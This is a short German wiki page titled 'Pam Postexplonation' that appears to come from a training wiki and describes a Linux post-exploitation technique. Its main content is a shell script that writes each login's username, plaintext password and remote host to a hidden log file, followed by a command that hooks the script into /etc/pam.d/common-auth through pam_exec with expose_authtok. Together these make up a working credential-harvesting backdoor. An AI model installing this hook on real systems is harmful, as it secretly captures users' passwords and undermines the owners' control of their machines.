Pam Postexplonation

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Wir loggen jeden Einlogversuch mit

  • vi /usr/local/bin/toomanysecrets.sh
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
  • chmod 700 /usr/local/bin/toomanysecrets.sh

Wir hängen das Script an das Ende der common-auth

  • echo "auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh" >> /etc/pam.d/common-auth
Abgerufen von „http://wiki.ixheim.de/index.php?title=Pam_Postexplonation&oldid=43338